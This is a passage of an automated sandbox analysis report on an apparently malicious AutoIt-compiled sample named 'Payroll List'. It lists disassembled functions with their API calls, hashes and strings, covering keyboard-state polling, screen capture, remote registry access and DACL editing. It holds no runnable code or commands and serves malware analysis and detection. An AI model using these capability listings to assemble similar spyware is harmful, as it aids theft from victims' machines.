                                                                    • Opcode Fuzzy Hash: 8ed08d3f1ecabde64b2483047bc79dcc077eac59e82f6b85ca6a929d273b9ce6
                                                                    • Instruction Fuzzy Hash: 17819F70608301EFD710EF14D888A6BBBE9FB88314F14452EF99997291D770DA46CF92
                                                                    Function 0015A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0015ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0015ABD7
                                                                      • Part of subcall function 0015ABBB: GetLastError.KERNEL32(?,0015A69F,?,?,?), ref: 0015ABE1
                                                                      • Part of subcall function 0015ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0015A69F,?,?,?), ref: 0015ABF0
                                                                      • Part of subcall function 0015ABBB: HeapAlloc.KERNEL32(00000000,?,0015A69F,?,?,?), ref: 0015ABF7
                                                                      • Part of subcall function 0015ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0015AC0E
                                                                      • Part of subcall function 0015AC56: GetProcessHeap.KERNEL32(00000008,0015A6B5,00000000,00000000,?,0015A6B5,?), ref: 0015AC62
                                                                      • Part of subcall function 0015AC56: HeapAlloc.KERNEL32(00000000,?,0015A6B5,?), ref: 0015AC69
                                                                      • Part of subcall function 0015AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0015A6B5,?), ref: 0015AC7A
                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0015A8CB
                                                                    • _memset.LIBCMT ref: 0015A8E0
                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0015A8FF
                                                                    • GetLengthSid.ADVAPI32(?), ref: 0015A910
                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0015A94D
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0015A969
                                                                    • GetLengthSid.ADVAPI32(?), ref: 0015A986
                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0015A995
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0015A99C
                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0015A9BD
                                                                    • CopySid.ADVAPI32(00000000), ref: 0015A9C4
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0015A9F5
                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0015AA1B
                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0015AA2F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                    • String ID:
                                                                    • API String ID: 3996160137-0
                                                                    • Opcode ID: ba9b9ebf598c7dd5364b84c6d5685d870d8e09b0becbebb84c80d4faee307b6c
                                                                    • Instruction ID: 572c89c80beeb9f54aa3ad3d9e8e95f71ce2108e0c58a2e198bc9244f0babcc3
                                                                    • Opcode Fuzzy Hash: ba9b9ebf598c7dd5364b84c6d5685d870d8e09b0becbebb84c80d4faee307b6c
                                                                    • Instruction Fuzzy Hash: D2516C71940209EFDF10CFA0DD45AEEBB79FF05301F44821AF926AB690DB709A49CB61
                                                                    Function 00179DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 00179E36
                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00179E42
                                                                    • CreateCompatibleDC.GDI32(?), ref: 00179E4E
                                                                    • SelectObject.GDI32(00000000,?), ref: 00179E5B
                                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00179EAF
                                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00179EEB
                                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00179F0F
                                                                    • SelectObject.GDI32(00000006,?), ref: 00179F17
                                                                    • DeleteObject.GDI32(?), ref: 00179F20
                                                                    • DeleteDC.GDI32(00000006), ref: 00179F27
                                                                    • ReleaseDC.USER32(00000000,?), ref: 00179F32
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                    • String ID: (
                                                                    • API String ID: 2598888154-3887548279
                                                                    • Opcode ID: 6a91540ee8ab1f4242ad06d2eed5ba7a5fb8ffb45905e490a14a9d0b47beb05a
                                                                    • Instruction ID: 1aca43ce5e3c31bef7e1510584ee76124e7286a0db7c65805d8a872ab4728e59
                                                                    • Opcode Fuzzy Hash: 6a91540ee8ab1f4242ad06d2eed5ba7a5fb8ffb45905e490a14a9d0b47beb05a
                                                                    • Instruction Fuzzy Hash: 79514975A00709EFCB14CFA8DC85EAEBBB9EF49310F14841DF95AA7610C731A945CB90
                                                                    Function 0016CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: LoadString__swprintf_wprintf
                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                    • API String ID: 2889450990-2391861430
                                                                    • Opcode ID: 0bdd1ef839f6f4721eaca08fbb0a5a6f903a64efccefe229bc29e6519cda024a
                                                                    • Instruction ID: a1b3f1eeb6ece6ee2247a6e59b13ee0f4646c3d45e85f107d8f3afff97bbda61
                                                                    • Opcode Fuzzy Hash: 0bdd1ef839f6f4721eaca08fbb0a5a6f903a64efccefe229bc29e6519cda024a
                                                                    • Instruction Fuzzy Hash: 7D51A071800119BACB14EBE0DD86EEEBB79AF24340F100065F505731A2EB316FA9DBA1
                                                                    Function 0016CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: LoadString__swprintf_wprintf
                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                    • API String ID: 2889450990-3420473620
                                                                    • Opcode ID: 4cf4e56d5aba404306825fd5ee9a22cdf735f53496988ab785e7581456cc9adc
                                                                    • Instruction ID: eaae71573327e1e7a1937556946e298aa9fb62c700b44623da26f27192788df4
                                                                    • Opcode Fuzzy Hash: 4cf4e56d5aba404306825fd5ee9a22cdf735f53496988ab785e7581456cc9adc
                                                                    • Instruction Fuzzy Hash: 6D519171900119BACF15EBE0ED86EEEB779AF24340F100065F50572162EB716FA9DFA1
                                                                    Function 001655BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 001655D7
                                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00165664
                                                                    • GetMenuItemCount.USER32(001E1708), ref: 001656ED
                                                                    • DeleteMenu.USER32(001E1708,00000005,00000000,000000F5,?,?), ref: 0016577D
                                                                    • DeleteMenu.USER32(001E1708,00000004,00000000), ref: 00165785
                                                                    • DeleteMenu.USER32(001E1708,00000006,00000000), ref: 0016578D
                                                                    • DeleteMenu.USER32(001E1708,00000003,00000000), ref: 00165795
                                                                    • GetMenuItemCount.USER32(001E1708), ref: 0016579D
                                                                    • SetMenuItemInfoW.USER32(001E1708,00000004,00000000,00000030), ref: 001657D3
                                                                    • GetCursorPos.USER32(?), ref: 001657DD
                                                                    • SetForegroundWindow.USER32(00000000), ref: 001657E6
                                                                    • TrackPopupMenuEx.USER32(001E1708,00000000,?,00000000,00000000,00000000), ref: 001657F9
                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00165805
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                    • String ID:
                                                                    • API String ID: 3993528054-0
                                                                    • Opcode ID: daaac14bf68dc6e59f0a72155d3f8b3c921aef2c4e09718829a7fca0fd1b40ce
                                                                    • Instruction ID: 3a16640c7ec6991969b00db15bf6fc81af71979e7ed2f309967dbc8eb4609a9c
                                                                    • Opcode Fuzzy Hash: daaac14bf68dc6e59f0a72155d3f8b3c921aef2c4e09718829a7fca0fd1b40ce
                                                                    • Instruction Fuzzy Hash: 19710170640A05BFEB249F55DC89FAABF66FF01368F640205F6196A1E0C7B16C70CBA4
                                                                    Function 0015A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0015A1DC
                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0015A211
                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0015A22D
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0015A249
                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0015A273
                                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0015A29B
                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0015A2A6
                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0015A2AB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                    • API String ID: 1687751970-22481851
                                                                    • Opcode ID: f31b20cfe645178bbabd962c7668b95e3fb5549c7134fd02481a61632fe77484
                                                                    • Instruction ID: 132437ab11caaddcefa8fe8ad2157695fe79eb3f8257a476b0848a3deb7f5efe
                                                                    • Opcode Fuzzy Hash: f31b20cfe645178bbabd962c7668b95e3fb5549c7134fd02481a61632fe77484
                                                                    • Instruction Fuzzy Hash: 32411872C10629AFDF11EBA4EC95DEDB7B8BF14300F404169F912A7160EB709E19CB90
                                                                    Function 00183C06 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00182BB5,?,?), ref: 00183C1D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper
                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                    • API String ID: 3964851224-909552448
                                                                    • Opcode ID: 3060e19fb7731efade79ef9d8683c8c46a2ce89a7f1cdebf1fa08c7e091f7a4c
                                                                    • Instruction ID: 9fccb26147b2b5f9b3937b154f284642ae51577371afcf84eb31120a29efe058
                                                                    • Opcode Fuzzy Hash: 3060e19fb7731efade79ef9d8683c8c46a2ce89a7f1cdebf1fa08c7e091f7a4c
                                                                    • Instruction Fuzzy Hash: 92413D3010024A8BDF04FF50E991AEE3365AF22740F545955FC693B292EB70AB1ACF50
                                                                    Function 001625B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,001936F4,00000010,?,Bad directive syntax error,001BDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 001625D6
                                                                    • LoadStringW.USER32(00000000,?,001936F4,00000010), ref: 001625DD
                                                                    • _wprintf.LIBCMT ref: 00162610
                                                                    • __swprintf.LIBCMT ref: 00162632
                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 001626A1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                    • API String ID: 1080873982-4153970271
                                                                    • Opcode ID: 170d97be5654b1467766a5dab9e9ded5d02582f42cdfef65d860e43af4404bf5
                                                                    • Instruction ID: f5076932a9c93594817642c973e1f1cc476865bef2e075ce2eb739b0c3c84bc6
                                                                    • Opcode Fuzzy Hash: 170d97be5654b1467766a5dab9e9ded5d02582f42cdfef65d860e43af4404bf5
                                                                    • Instruction Fuzzy Hash: E2219131C0022ABFCF11AF90DC4AEEE7B39BF28304F000455F515661A2EB71A668DB51
                                                                    Function 00167AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00167B42
                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00167B58
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00167B69
                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00167B7B
                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00167B8C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: SendString
                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                    • API String ID: 890592661-1007645807
                                                                    • Opcode ID: be789f6c568c1b492aa6d5927d71ef6fb434d7fc5e19ed286d2aa9174e434893
                                                                    • Instruction ID: b3f674674f45f1bad2182942a093f69f1b5185b37225bdbadf6dd099afc45218
                                                                    • Opcode Fuzzy Hash: be789f6c568c1b492aa6d5927d71ef6fb434d7fc5e19ed286d2aa9174e434893
                                                                    • Instruction Fuzzy Hash: D711C4B16402697DD720B7A1DC8ADFF7B7CEBE1B04F00052A7421A31D1DB600A54C5B1
                                                                    Function 0016778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • timeGetTime.WINMM ref: 00167794
                                                                      • Part of subcall function 0013DC38: timeGetTime.WINMM(?,76C1B400,001958AB), ref: 0013DC3C
                                                                    • Sleep.KERNEL32(0000000A), ref: 001677C0
                                                                    • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 001677E4
                                                                    • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00167806
                                                                    • SetActiveWindow.USER32 ref: 00167825
                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00167833
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00167852
                                                                    • Sleep.KERNEL32(000000FA), ref: 0016785D
                                                                    • IsWindow.USER32 ref: 00167869
                                                                    • EndDialog.USER32(00000000), ref: 0016787A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                    • String ID: BUTTON
                                                                    • API String ID: 1194449130-3405671355
                                                                    • Opcode ID: 0682764bf5cf1647f31f8c6bdb3c1acdaf9a917589bf3637a650929d5ea8459c
                                                                    • Instruction ID: 00fbce6d1d969add73dabf1c3c4c27813aa3a4dc30e844683b5d77f17b92a386
                                                                    • Opcode Fuzzy Hash: 0682764bf5cf1647f31f8c6bdb3c1acdaf9a917589bf3637a650929d5ea8459c
                                                                    • Instruction Fuzzy Hash: 64216AB1204645AFE7055BA0FCCDE2A7F6AFB0634CF050068F51687EA2DB718DA0DA21
                                                                    Function 001702EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0012936C: __swprintf.LIBCMT ref: 001293AB
                                                                      • Part of subcall function 0012936C: __itow.LIBCMT ref: 001293DF
                                                                    • CoInitialize.OLE32(00000000), ref: 0017034B
                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 001703DE
                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 001703F2
                                                                    • CoCreateInstance.OLE32(001ADA8C,00000000,00000001,001D3CF8,?), ref: 0017043E
                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 001704AD
                                                                    • CoTaskMemFree.OLE32(?,?), ref: 00170505
                                                                    • _memset.LIBCMT ref: 00170542
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0017057E
                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 001705A1
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 001705A8
                                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 001705DF
                                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 001705E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                    • String ID:
                                                                    • API String ID: 1246142700-0
                                                                    • Opcode ID: c4c9f345cdb927b8ffdf7cecb387d407afc84f9cfa6798ed325b82350d65b315
                                                                    • Instruction ID: c56b3eca243488fef962cb5dd85f01d3f86b9796f1447280b13f4c5e305eeb9e
                                                                    • Opcode Fuzzy Hash: c4c9f345cdb927b8ffdf7cecb387d407afc84f9cfa6798ed325b82350d65b315
                                                                    • Instruction Fuzzy Hash: 7CB1D975A00219EFDB05DFA4D889DAEBBB9FF48304B148499F90AEB251DB30ED41CB50
                                                                    Function 00162E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 00162ED6
                                                                    • SetKeyboardState.USER32(?), ref: 00162F41
                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00162F61
                                                                    • GetKeyState.USER32(000000A0), ref: 00162F78
                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00162FA7
                                                                    • GetKeyState.USER32(000000A1), ref: 00162FB8
                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00162FE4
                                                                    • GetKeyState.USER32(00000011), ref: 00162FF2
                                                                    • GetAsyncKeyState.USER32(00000012), ref: 0016301B
                                                                    • GetKeyState.USER32(00000012), ref: 00163029
                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00163052
                                                                    • GetKeyState.USER32(0000005B), ref: 00163060
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: State$Async$Keyboard
                                                                    • String ID:
                                                                    • API String ID: 541375521-0
                                                                    • Opcode ID: 539afabefa5d95246e67f07298bd5acb9953994ac8b15791c13e0071eb6045d1
                                                                    • Instruction ID: 02b15cfdb12437398a801b4e0a02c289cde807c2c6f1347393d6f03b8946f6a9
                                                                    • Opcode Fuzzy Hash: 539afabefa5d95246e67f07298bd5acb9953994ac8b15791c13e0071eb6045d1
                                                                    • Instruction Fuzzy Hash: BB51F960A08B9429FB35EBB48D107EABFF45F12340F08459DD5C2575C2DBA4AB9CC7A2
                                                                    Function 0015ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000001), ref: 0015ED1E
                                                                    • GetWindowRect.USER32(00000000,?), ref: 0015ED30
                                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0015ED8E
                                                                    • GetDlgItem.USER32(?,00000002), ref: 0015ED99
                                                                    • GetWindowRect.USER32(00000000,?), ref: 0015EDAB
                                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0015EE01
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0015EE0F
